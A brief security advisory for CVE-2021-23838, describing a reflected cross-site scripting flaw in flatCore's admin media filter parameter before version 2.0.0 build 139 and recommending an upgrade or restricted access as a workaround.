CVE-2021-23838

Name of the Vulnerable Software and Affected Versions: flatCore versions prior to 2.0.0 build 139

Description: A reflected XSS issue was identified in the media filter HTTP request body parameter for the acp interface. This parameter accepts malicious client-side script without proper input sanitization, allowing a malicious user to steal cookies from a victim user and perform a session-hijacking attack, potentially leading to unauthorized access to the site.

Recommendations: For versions prior to 2.0.0 build 139, update to a version 2.0.0 build 139 or later to resolve the issue. As a temporary workaround, consider restricting access to the media filter parameter in the acp interface to minimize the risk of exploitation.